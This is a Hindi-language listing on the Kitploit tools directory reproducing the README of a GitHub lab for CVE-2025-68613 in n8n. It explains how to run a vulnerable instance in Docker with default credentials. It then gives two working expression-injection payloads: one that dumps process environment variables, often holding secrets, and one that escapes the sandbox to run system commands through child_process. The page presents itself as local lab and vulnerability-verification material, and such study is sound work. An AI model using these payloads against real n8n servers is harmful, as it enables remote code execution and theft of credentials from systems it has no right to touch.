Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-68613-n8n-lab — CVE-2025-68613 का विश्लेषण | Kitploit
उपकरण/GitHubGitHub/r4j3sh-com/cve-2025-68613-n8n-lab
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubr4j3sh-com/cve-2025-68613-n8n-lab

CVE-2025-68613-n8n-lab

CVE-2025-68613 का विश्लेषण

रिपॉजिटरी देखें
28 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-68613 स्थानीय n8n लैब

यह रिपॉजिटरी एक सरल Docker Compose सेटअप प्रदान करती है जो CVE-2025-68613 के स्थानीय परीक्षण के लिए एक कमजोर n8n इंस्टेंस चलाती है।

आवश्यकताएँ

  • Docker Desktop या Docker Engine
  • Docker Compose v2

त्वरित आरंभ

  1. कंटेनर शुरू करें:

    root@kitploit:~
    docker compose up -d
    
  2. अपने ब्राउज़र में n8n खोलें:

    • http://localhost:5678
  3. docker-compose.yml में सेट किए गए डिफ़ॉल्ट क्रेडेंशियल्स से लॉग इन करें:

    • उपयोगकर्ता नाम: admin
    • पासवर्ड: password

रोकें और साफ करें

root@kitploit:~
docker compose down

अस्वीकरण और सुरक्षा

यह वातावरण केवल स्थानीय, पृथक परीक्षण के लिए है। इस इंस्टेंस को सार्वजनिक इंटरनेट या किसी अविश्वसनीय नेटवर्क पर उजागर न करें। इसे निजी, केवल-स्थानीय नेटवर्क सेगमेंट पर रखें और उत्पादन प्रणालियों से अलग रखें। अपने जोखिम पर उपयोग करें।

कमजोरी सत्यापित करें (प्रमाण अवधारणा का)

एक बार कंटेनर चलने के बाद, आप n8n इंटरफ़ेस को http://localhost:5678 पर एक्सेस कर सकते हैं। कमजोरी का परीक्षण करने के लिए, आप एक अभिव्यक्ति फ़ील्ड में एक दुर्भावनापूर्ण JavaScript पेलोड इंजेक्ट करेंगे।

पुनरुत्पादन के चरण:

  1. लॉग इन करें: डैशबोर्ड तक पहुंचें (यदि आपने बेसिक प्रमाणीकरण सेट किया है, तो प्रदान किए गए क्रेडेंशियल का उपयोग करें; अन्यथा, एक नया स्वामी खाता बनाएं)।
  2. वर्कफ़्लो बनाएं: "Add Workflow" पर क्लिक करें या https://n8n.example.com/workflow/new पर जाएं।
  3. नोड जोड़ें: एक "Set" नोड जोड़ें।
  4. पेलोड इंजेक्ट करें: Set नोड के "Value" फ़ील्ड में (सुनिश्चित करें कि आप "Expression" मोड टॉगल करें यदि उपलब्ध हो, या बस सिंटैक्स पेस्ट करें जिसे n8n एक अभिव्यक्ति के रूप में व्याख्या करता है), निम्नलिखित पेलोड में से एक इनपुट करें: परीक्षण 1: पर्यावरण चर निकासी यह पेलोड प्रक्रिया पर्यावरण चर तक पहुंचने का प्रयास करता है, जिसमें अक्सर गुप्त जानकारी होती है।
root@kitploit:~
{{ (function() { return this.process.env; })() }}

env exfilteration

परीक्षण 2: दूरस्थ कोड निष्पादन (RCE) यह पेलोड child_process मॉड्यूल को लोड करने का प्रयास करता है ताकि सिस्टम कमांड चलाए (जैसे, whoami)।

root@kitploit:~
{{ (function() {
    var require = this.process.mainModule.require;
    var execSync = require('child_process').execSync;
    return execSync('whoami').toString();
})() }}

RCE example for id command

अपेक्षित परिणाम: यदि वातावरण कमजोर है, तो Set नोड का "Output" पैनल कमांड का परिणाम (जैसे, root या n8n उपयोगकर्ता) या पर्यावरण चरों वाला एक JSON ऑब्जेक्ट प्रदर्शित करेगा। यदि इंस्टेंस को पैच किया गया था (जैसे, संस्करण 1.122.0+), तो सैंडबॉक्स एक खाली ऑब्जेक्ट या एक त्रुटि लौटाएगा।

टूल डाउनलोड करें